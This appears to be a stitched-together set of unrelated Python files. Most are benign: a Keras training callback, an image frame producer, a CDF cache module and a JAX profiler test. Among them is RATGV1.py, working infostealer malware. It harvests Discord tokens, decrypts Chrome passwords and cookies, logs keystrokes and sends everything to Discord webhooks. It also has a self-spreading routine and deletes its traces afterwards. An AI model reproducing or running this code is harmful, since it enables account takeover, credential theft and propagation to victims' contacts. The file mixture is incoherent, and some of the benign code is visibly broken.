#red_print("cleared all meassages under topic name {}".format(self.publish_topic))
else:
red_print("payload was not dictionary, did not send")
def on_message(self,client, userdata, msg):
message = json.loads(msg.payload.decode('utf-8'))
#print(message)
if self.start ==False:
#connection has not been acknowledged
#message = json.loads(msg.payload.decode('utf-8'))
if message['status'] == 'acknowledged':
self.start = True
else:
red_print('did not understand msg::{}'.format(message))
else:
#self.subscribe_topic = msg.topic
self.msg = message
#red_print("got a message")
if self.verbose > 0:
cyan_print("Received a new command from JukeBox")
#cyan_print(self.subscribe_topic+" "+str(self.msg))
self.update_variables()
def update_variables(self):
tab_1_cmd = self.msg['tab1']
tab_2_cmd = self.msg['tab2']
if tab_1_cmd['play_status'] in ['play', 'pause', 'stop']:
self.play_status = tab_1_cmd['play_status']
self.frontend_learning_rate = tab_2_cmd['learning_rate']
else:
red_print("Play command '{}' in not supported so rejected whole message, retaining previous command '{}'".format(tab_1_cmd['play_status'],self.play_status))
if self.frontend_learning_rate != self.frontend_learning_rate_prev:
self.update_learning_rate = True
self.frontend_learning_rate_prev = self.frontend_learning_rate
#self.update_learning_rate = tab_2_cmd['update_learning_rate']
def on_train_begin(self, logs):
thr = threading.Thread(target=self.start_listening)
thr.daemon = True
thr.start()
if not hasattr(self.model.optimizer, 'lr'):
raise ValueError('Optimizer must have a "lr" attribute.')
green_print('waiting for a JukeBox')
while not self.start:
pass
green_print('connected to JukeBox')
self.backend_learning_rate = float(K.get_value(self.model.optimizer.lr))
# After connection is ack initialize this lr in GUI
def on_batch_begin(self, batch, logs=None):
self.current_batch = batch
# if play has not been initiated, go into an infinite loop
#run_status_displayed=False
if self.play_status in ['pause', 'stop']:
if self.play_status == 'pause':
yellow_print('paused from frontend')
if self.play_status == 'stop':
self.stopped_from_frontend = True
self.model.stop_training = True
while self.play_status =='pause':
# TO DO take a snapshot if hinted by frontend
if self.msg != None: # if self.msg==None, it means session is not yet acknowledged
if self.msg['tab3']['take_snapshot']:
self.take_a_snapshot()
pass
green_print('Resuming ..')
if not hasattr(self.model.optimizer, 'lr'):
raise ValueError('Optimizer must have a "lr" attribute.')
self.backend_learning_rate = float(K.get_value(self.model.optimizer.lr))
#lr = float(K.get_value(self.model.optimizer.lr))
#self.frontend_learning_rate is updated by on_message function
if not isinstance(self.frontend_learning_rate, (float, np.float32, np.float64)):
raise ValueError('The output of the "schedule" function '
'should be float.')
#if self.backend_learning_rate != self.frontend_learning_rate:
if self.update_learning_rate:
if self.verbose > 0:
yellow_print('updated learning rate from {} to {}'.format(self.backend_learning_rate, self.frontend_learning_rate))
K.set_value(self.model.optimizer.lr, self.frontend_learning_rate)
self.update_learning_rate = False
# recapture this learning rate to send to FrontEnd
self.backend_learning_rate = float(K.get_value(self.model.optimizer.lr))
# send learning rate to frontend
#if self.verbose > 0:
# red_print('\nEpoch %05d: JukeBox reducing learning '
# 'rate to %s.' % (epoch + 1, lr))
def take_a_snapshot(self):
tab3_payload = self.msg['tab3']
folder_path = tab3_payload['checkpoint_path']
checkpoint_name = '{}_E{}_B{}'.format(tab3_payload['checkpoint_name'], self.current_epoch, self.current_batch)
filepath = os.path.join(folder_path, checkpoint_name) #generate snapshot from os.path.join(folder_path, checkpoint_name{epoch:02d})
if tab3_payload['h5']:
self.model.save(filepath+'.h5')
if tab3_payload['ckpt']:
self.model.save_weights(filepath+'.ckpt')
if self.verbose >0:
yellow_print("Took a snapshot at Epoch-{}, at batch-{}".format(self.current_epoch, self.current_batch))
# after taking a snapshot make it False
self.msg['tab3']['take_snapshot'] = False
def on_batch_end(self, batch, logs=None):
#check tab3_payload for taking a checkpoint
tab3_payload = self.msg['tab3']
#{'take_snapshot': True, 'h5':False, 'ckpt': False, 'checkpoint_name':checkpoint_name}
if tab3_payload['take_snapshot'] :
# write function to take snapshot here
self.take_a_snapshot()
payload = {'learning_rate':self.backend_learning_rate,
'epoch':self.current_epoch,
'batch':self.current_batch}
self.publish_data(payload)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs['lr'] = K.get_value(self.model.optimizer.lr)
self.current_epoch = epoch+1
def on_train_end(self, logs):
if self.stopped_from_frontend:
red_print("training stopped from JukeBox")
else:
green_print("training complete, terminated naturally")
self.publish_data(payload=None)
|
RATGV1.py
|
import os
if os.name != "nt":
exit()
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from codecs import encode
import getpass
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
from pathlib import Path
from discord_webhook import DiscordWebhook, DiscordEmbed
import requests
import random
import sys
from pynput.keyboard import Key, Listener
ext = {"webhook": "ChangeMe", "webhook-name": "ChangeMe"}
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
},
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"Token grabber by Rezizt"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Rezizt tf you doing",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request(webhook, data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
def get_master_key():
# this finds the key needed to decrypt the Local Data passwords
with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
local_state = f.read()
local_state = json.loads(local_state)
# iterate through the file and find the key which is to the right of os_crypt
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:] # removing DPAPI
master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
try:
return master_key # return the key in plain text
except:
exit()
def decrypt_payload(cipher, payload):
try:
return cipher.decrypt(payload)
except:
pass
def generate_cipher(aes_key, iv):
try:
return AES.new(aes_key, AES.MODE_GCM, iv)
except:
pass
def decrypt_password(buff, master_key):
try:
iv = buff[3:15]
payload = buff[15:]
cipher = generate_cipher(master_key, iv)
decrypted_pass = decrypt_payload(cipher, payload)
decrypted_pass = decrypted_pass[:-16].decode() # remove suffix bytes
try:
return decrypted_pass
except:
pass
except Exception as e:
# print("Probably saved password from Chrome version older than v80\n")
# print(str(e))
decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
return str(decrypted_pass[1])
if __name__ == '__main__':
master_key = get_master_key()
login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
try:
# grab the needed information
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
# make a local file with the login data
passfile = open("passwords.txt", "w")
for r in cursor.fetchall():
# these 2 are already in plain text
url = r[0]
username = r[1]
encrypted_password = r[2]
# now decrypt the password using the master key via AES encryption / decryption
decrypted_password = decrypt_password(encrypted_password, master_key)
#print("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
# sort it and make it look more organised
passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
# finish the files
passfile.close()
conn.close()
except Exception as e:
pass
def get_master_key():
# this finds the key needed to decrypt the Local Data passwords
with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
local_state = f.read()
local_state = json.loads(local_state)
# iterate through the file and find the key which is to the right of os_crypt
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:] # removing DPAPI
master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
return master_key # return the key in plain text
def decrypt_payload(cipher, payload):
return cipher.decrypt(payload)
def generate_cipher(aes_key, iv):
return AES.new(aes_key, AES.MODE_GCM, iv)
def decrypt_cookies(buff, master_key):
try:
iv = buff[3:15]
payload = buff[15:]
cipher = generate_cipher(master_key, iv)
decrypted_cook = decrypt_payload(cipher, payload)
decrypted_cook = decrypted_cook[:-16].decode() # remove suffix bytes
return decrypted_cook
except Exception as e:
# print("Probably saved password from Chrome version older than v80\n")
# print(str(e))
decrypted_cook = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
return str(decrypted_cook[1])
if __name__ == '__main__':
master_key = get_master_key()
try:
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;')
except:
pass
try:
# grab the needed information
cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;')
# make a local file with the login data
passfile = open('cookies' + '.txt', "w")
for r in cursor.fetchall():
# these 2 are already in plain text
url = r[1]
username = r[2]
encrypted_cookies = r[0]
# now decrypt the password using the master key via AES encryption / decryption
decrypted_cookies = decrypt_cookies(encrypted_cookies, master_key)
#print("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_cookies + "\n" + "*" * 50 + "\n")
# sort it and make it look more organised
passfile.write("URL: " + url + "\nWebsite: " + username + "\nCookie: " + decrypted_cookies + "\n" + "-" * 50 + "\n")
# finish the files
passfile.close()
conn.close()
except Exception as e:
print(e)
webhook = DiscordWebhook(url=webhook, username="Passwords and cookies")
def on_press(key):
webhook = DiscordWebhook(url=ext['webhook'], content=f"| Date: {today} | KEY: {str(key)} | PC name: {pcname} |", username=ext['webhook-name'])
response = webhook.execute()
def listener_s():
with Listener(on_press=on_press) as listener:
listener.join()
# send two images
with open("cookies.txt", "rb") as f:
webhook.add_file(file=f.read(), filename='cookies.txt')
with open("passwords.txt", "rb") as f:
webhook.add_file(file=f.read(), filename='passwords.txt')
response = webhook.execute()
os.remove("cookies.txt")
os.remove("passwords.txt")
os.remove("Loginvault.db")
|
frame_producer.py
|
import logging
import queue
import sys
import threading
import time
import click
import numpy as np
import struct
from skimage import io
from os import listdir, walk
from os.path import join
from odin_data.shared_buffer_manager import SharedBufferManager, SharedBufferManagerException
from odin_data.ipc_channel import IpcChannel, IpcChannelException
from odin_data.ipc_message import IpcMessage, IpcMessageException
from .frame_producer_config import FrameProducerConfig
class FrameProducer():
def __init__(self, config_file):
# Create a configuration object with default settings, loading from a config file if
# specified
self.config = FrameProducerConfig(config_file=config_file)
# Create a logger and set up a console handler with the appropriate format
self.logger = logging.getLogger('frame_producer')
ch = logging. StreamHandler(sys.stdout)
formatter = logging.Formatter(fmt=self.config.log_format, datefmt="%d/%m/%y %H:%M:%S")
ch.setFormatter(formatter)
self.logger.addHandler(ch)
# Set the logging level if defined legally in the configuration
log_level = getattr(logging, self.config.log_level.upper(), None)
if log_level:
ch.setLevel(log_level)
self.logger.setLevel(log_level)
self.logger.info("FrameProducer starting up")
# Initialise the shared buffer manager
self.shared_buffer_manager = SharedBufferManager(
self.config.shared_buffer,
self.config.shared_mem_size,
self.config.shared_buffer_size,
remove_when_deleted=True,
boost_mmap_mode=self.config.boost_mmap_mode
)
self.logger.debug(
"Mapped shared buffer manager %s id %d with %d buffers of size %d",
self.config.shared_buffer,
self.shared_buffer_manager.get_manager_id(),
self.shared_buffer_manager.get_num_buffers(),
self.shared_buffer_manager.get_buffer_size()
)
# Create the frame ready channel and bind it to the endpoint
self.ready_channel = IpcChannel(IpcChannel.CHANNEL_TYPE_PUB)
self.ready_channel.bind(self.config.ready_endpoint)
self.logger.debug(
"Created frame ready IPC channel on endpoint %s",
self.config.ready_endpoint
)
# Create the frame release channel, bind it to the endpoint and set the default
# subscription on the channel
self.release_channel = IpcChannel(IpcChannel.CHANNEL_TYPE_SUB)
self.release_channel.bind(self.config.release_endpoint)
self.release_channel.subscribe(b'')
self.logger.debug(
"Created frame release IPC channel on endpoint %s",
self.config.release_endpoint
)
# Create the queue to contain available buffer IDs and precharge it with all available
# shared memory buffers
self.free_buffer_queue = queue.Queue()
for idx in range(self.shared_buffer_manager.get_num_buffers()):
self.free_buffer_queue.put(idx)
self.logger.debug(
"Created free buffer queue with %d buffers pre-charged",
self.free_buffer_queue.qsize()
)
# Initialise msg index counter
self._next_msg_id = 0
# Set the internal run flag to true
self._run = True
self.frame = 0
# Create a thread to handle frame release messages
self.release_thread = threading.Thread(target=self.process_release)
# Start the release channel processing thread
self.release_thread.start()
def get_next_msg_id(self):
"""Increment and return the next message ID for IPC messages."""
self._next_msg_id += 1
return self._next_msg_id
# Enumerate the data type so it can be sent in frame header
def get_dtype_enumeration(random, img_dtype):
list_of_dtypes = ["unknown","uint8","uint16","uint32","uint64","float"]
# Is theee data type contained within the odin data eenuumeeration list?
if img_dtype in list_of_dtypes:
enumerated_dtype = list_of_dtypes.index(img_dtype)
else:
enumerated_dtype = 0
# Return the enumerated data type
return enumerated_dtype
# Convert image from rgb to gray
def rgb2gray(random, img):
#Convert from rgb to gray
return np.dot(img[...,:3],[0.2989, 0.5870, 0.1140])
def run(self, frames, fps, imgs_path, camera_emulator):
try:
"""Run the frame producer main event loop."""
# Check if config from camera emulator is not None
if frames == None:
frames = self.config.frames
if fps == None:
fps = self.config.frames_per_second
if imgs_path == None:
imgs_path = self.config.testfile_path
# Allow the IPC channels to connect and then notify the frame processor of the buffer
# configuration
time.sleep(1.0)
self.notify_buffer_config()
file_list = listdir(testfilespath)
# Loop over the specified number of frames and transmit them
self.logger.info("Sending %d frames to processor\n", self.config.frames)
self.logger.info("Total Frame count: %d", len(file_list))
# Loop over the specified number of frames and transmit them
self.logger.info("Sending %d frames to processor\n", frames)
self.frame = 0
self.send_frames = True
while self.send_frames:
try:
# Frame producer code here
self.logger.debug(" ----- Beginning creation of frame %d -----\n\n", self.frame)
# Set image path based on frame number
testimage = file_list[frame%len(file_list)]
# Set image path based on frame number
testimage = listdir(imgs_path)[self.frame%totalimages]
# Load image
vals = io.imread(join(imgs_path,testimage))
# Is the image RGB or Grayscale?
if (len(vals.shape) >= 3):
# Convert to Grayscale
vals = self.rgb2gray(vals)
# Correct data type
vals = vals.astype(np.uint8)
# Debugging of image loading
self.logger.debug("The filename is " + testimage)
self.logger.debug("The first 10 frame values: " + str(vals[0][:10]))
# Pop the first free buffer off the queue
# TODO deal with empty queue??
buffer = self.free_buffer_queue.get()
# Split image shape from (x, y) into x and y
imageshape = vals.shape
imagewidth = imageshape[0]
imageheight = imageshape[1]
self.logger.debug("Width " + str(imagewidth) + " Height " + str(imageheight) + "\n")
# What is the dtype outputting
self.logger.debug("Data Type: " + str(vals.dtype))
self.logger.debug("Data Type Enumeration: " + str(self.get_dtype_enumeration(vals.dtype.name)) + "\n")
# Create struct with these parameters for the header
# frame_header, (currently ignoring)frame_state, frame_start_time_secs, frame_start_time_nsecs, frame_width, frame_height, frame_data_type, frame_size
header = struct.pack("iiiii", self.frame, imagewidth, imageheight, self.get_dtype_enumeration(vals.dtype.name), vals.size)
# Copy the image nparray directly into the buffer as bytes
self.logger.debug("Filling frame %d into buffer %d", self.frame, buffer)
self.shared_buffer_manager.write_buffer(buffer, header + vals.tobytes())
# Notify the processor that the frame is ready in the buffer
self.notify_frame_ready(self.frame, buffer)
self.logger.debug("----- Creation of frame %d complete -----\n\n", self.frame)
# Sent frames at a set frame rate using config
time.sleep(1/fps)
# Next frame
self.frame += 1
# Are all frames sent?
if (self.frame == (frames)):
self.send_frames = False
except KeyboardInterrupt:
self.send_frames = False
# Update state of the emulator
camera_emulator.state = 2
except Exception:
self.send_frames = False
self.logger.warning("Error in frame producer")
self.logger.info("Frame producer stopping")
def stop(self):
# Clear the run flag and wait for the release processing thread to terminate
self._run = False
self.release_thread.join()
self.logger.info("Frame Producer Terminating")
def process_release(self):
"""Handle buffer release notifications from the frame processor."""
self.logger.debug("Release processing thread started")
# Keep looping while the global run flag is set
while self._run:
# Poll the release channel for frame release messages with a short timeout, allowing
# this loop to 'tick'
if self.release_channel.poll(100):
release_msg = IpcMessage(from_str=self.release_channel.recv())
# Extract the message type and value fields
msg_type = release_msg.get_msg_type()
msg_val = release_msg.get_msg_val()
# Handle a frame release notification
if msg_type == 'notify' and msg_val == 'frame_release':
# Get the buffer ID and frame number from the message parameters
buffer_id = release_msg.get_param('buffer_id')
frame = release_msg.get_param("frame")
# Push the released buffer onto the free buffer queue
self.free_buffer_queue.put(buffer_id)
self.logger.debug(
"Got frame release notification for frame %d in buffer %d \n",
frame, buffer_id
)
# Handle an async buffer config request from the processor
elif msg_type == 'cmd' and msg_val == 'request_buffer_config':
self.logger.debug("Got buffer config request from processor")
self.notify_buffer_config()
# If an unexpected message is received on the release channel, just log a message
else:
self.logger.warn(
"Got Unexpected IPC message on frame release channel: %s ",
release_msg
)
self.logger.debug("Release processing thread terminating")
def notify_buffer_config(self):
"""Notify the processor of the current shared buffer configuration."""
self.logger.info("Notifying downstream processor of shared buffer configuration")
config_msg = IpcMessage(msg_type='notify', msg_val='buffer_config', id=self.get_next_msg_id())
config_msg.set_param('shared_buffer_name', self.config.shared_buffer)
self.ready_channel.send(config_msg.encode())
def notify_frame_ready(self, frame, buffer):
"""Notify the processor that a frame is ready in a shared buffer."""
ready_msg = IpcMessage(msg_type='notify', msg_val='frame_ready', id=self.get_next_msg_id())
ready_msg.set_param('frame', frame)
ready_msg.set_param('buffer_id', buffer)
self.ready_channel.send(ready_msg.encode())
@click.command()
@click.option('--config', help="The path to the required yml config file.")
def main(config):
fp = FrameProducer(config)
if __name__ == "__main__":
main()
|
CDFCache.py
|
import re
import shutil
from pathlib import Path
from datetime import datetime
import cdflib
from threading import Thread
from typing import List, Callable, Any, TypeVar, Generic, Union, Dict
from .constants import requestMaxRetries, cacheFolder, cdas
def get(
fileDescription: (
Union[Dict[str, Union[str, int]], List[Dict[str, Union[str, int]]]]
),
onDone: Callable[[bool, cdflib.cdfread.CDF], None],
onError: Callable[[Any], None],
beforeRequest: Callable[[], Any] = None,
reload: bool = False,
**kwargs
) -> None:
"""
Gets the data from either the cache synchronously or loads it
asynchronously by calling "requests". You have to check yourself in the
calling thread when the requests have finished!
Parameters
----------
fileDescription
Dict from CdasWS.get_data_file() with keys Name, MimeType, StartTime,
EndTime, Length and LastModified
onDone
Called when the data has been loaded either from cache (calling
thread) or from requests (new thread). The first argument is True
when the data was loaded from cache. The second argument is the
result from the responses optionally passed through processResponse
onError
Called when there is an error and gets the error as first argument
beforeRequest
Called before a request is made in the calling thread
reload
When False (default), tries to read from cache and then executes the
requests if reading failed. When True ignores the cache.
kwargs
Any remaining keyword arguments will be passed to CdasWs.download()
"""
if isinstance(fileDescription, list):
return [
get(fd, onDone, onError, beforeRequest, reload, **kwargs)
for fd in fileDescription
]
cachedFile = (
cacheFolder
+ re.search(r"/tmp/([^/]+/[^/]+)$", fileDescription["Name"]).group(1)
)
cachedFilePath = Path(cachedFile)
def load():
tempFile = None
err = False
for i in range(requestMaxRetries):
err = False
try:
tempFile = cdas.download(
fileDescription["Name"], fileDescription["Length"], **kwargs
)
break
except Exception as e:
err = e
if (err or tempFile is None) and onError:
if cachedFilePath.is_file():
cdf = None
cdfRead = False
try:
cdf = _read_del_invalid_CDF(cachedFile)
cdfRead = True
except Exception as e:
pass
if cdfRead:
onDone(True, cdf)
return
onError(err if err else tempFile)
return
if not cachedFilePath.parent.exists():
cachedFilePath.parent.mkdir()
shutil.move(tempFile, cachedFile)
cdf = None
try:
cdf = _read_del_invalid_CDF(cachedFile)
except Exception as e:
onError(e)
return
onDone(False, cdf)
if not reload:
if (cachedFilePath.is_file() and datetime.fromtimestamp(
cachedFilePath.stat().st_mtime) >= datetime.fromisoformat(
fileDescription["LastModified"].replace("Z", ""))):
cdf = None
cdfRead = False
try:
cdf = _read_del_invalid_CDF(cachedFile)
cdfRead = True
except Exception as e:
onError(e)
if cdfRead:
onDone(True, cdf)
else:
reload = True
if reload:
if cachedFilePath.is_file():
cachedFilePath.unlink()
if beforeRequest:
beforeRequest()
t = Thread(target=load)
t.daemon = True
t.start()
def _read_del_invalid_CDF(file: str) -> cdflib.cdfread.CDF:
try:
return _read_CDF(file)
except NotFoundError:
p = Path(file)
p.unlink()
# clean up empty folder
empty = True
for child in p.parent.iterdir():
empty = False
break
if empty:
try:
p.parent.rmdir()
except OSError:
pass
raise
def _read_CDF(file: str) -> cdflib.cdfread.CDF:
try:
return cdflib.CDF(file)
except OSError as e:
if "is not a CDF file" in str(e):
with open(file, mode="r") as f:
content = f.read()
if (content.startswith(("<!DOCTYPE HTML", "<html"))
and "<title>404 Not Found</title>" in content):
raise NotFoundError(file)
raise
class NotFoundError(Exception):
"""Error raised when the CDF file was not found
Attributes:
file -- path to the file that was requested
"""
def __init__(self, file: str):
self.file = file
def __str__(self):
return "NotFoundError: File \"{}\" was not found on the server".format(
re.sub(r"^(?:\.?[\\/])?cache\b", "", self.file)
)
|
profiler_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import glob
import os
import shutil
import threading
import unittest
from absl.testing import absltest
import jax
import jax.numpy as jnp
import jax.profiler
from jax.config import config
import jax.test_util as jtu
try:
import portpicker
except ImportError:
portpicker = None
try:
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as tf_profiler
except ImportError:
profiler_client = None
tf_profiler = None
config.parse_flags_with_absl()
class ProfilerTest(unittest.TestCase):
# These tests simply test that the profiler API does not crash; they do not
# check functional correctness.
def setUp(self):
super().setUp()
self.worker_start = threading.Event()
self.profile_done = False
@unittest.skipIf(not portpicker, "Test requires portpicker")
def testStartServer(self):
port = portpicker.pick_unused_port()
jax.profiler.start_server(port=port)
del port
def testTraceContext(self):
x = 3
with jax.profiler.TraceContext("mycontext"):
x = x + 2
def testTraceFunction(self):
@jax.profiler.trace_function
def f(x):
return x + 2
self.assertEqual(f(7), 9)
@partial(jax.profiler.trace_function, name="aname")
def g(x):
return x + 2
self.assertEqual(g(7), 9)
@partial(jax.profiler.trace_function, name="aname", akwarg="hello")
def h(x):
return x + 2
self.assertEqual(h(7), 9)
def testDeviceMemoryProfile(self):
x = jnp.ones((20,)) + 7.
self.assertIsInstance(jax.profiler.device_memory_profile(), bytes)
del x
def _check_xspace_pb_exist(self, logdir):
path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
@unittest.skipIf(not (portpicker or profiler_client or tf_profiler),
"Test requires tensorflow.profiler and portpicker")
def testSingleWorkerSamplingMode(self, delay_ms=None):
def on_worker(port, worker_start):
# Must keep return value `server` around.
server = jax.profiler.start_server(port) # noqa: F841
worker_start.set()
x = jnp.ones((1000, 1000))
while True:
with jax.profiler.TraceContext("atracecontext"):
jnp.dot(x, x.T).block_until_ready()
if self.profile_done:
break
def on_profile(port, logdir, worker_start):
worker_start.wait()
options = tf_profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=2,
device_tracer_level=1,
delay_ms=delay_ms,
)
# Request for 1000 milliseconds of profile.
duration_ms = 1000
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 1000, options)
self.profile_done = True
logdir = absltest.get_default_test_tmpdir()
# Remove any existing log files.
shutil.rmtree(logdir, ignore_errors=True)
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(
target=on_profile, args=(port, logdir, self.worker_start))
thread_worker = threading.Thread(
target=on_worker, args=(port, self.worker_start))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_xspace_pb_exist(logdir)
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
downloadclient.py
|
# -*- coding: utf-8 -*-
# Copyright 2018-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Tomas Javurek <tomas.javurek@cern.ch>, 2018-2021
# - Vincent Garonne <vincent.garonne@cern.ch>, 2018
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2018
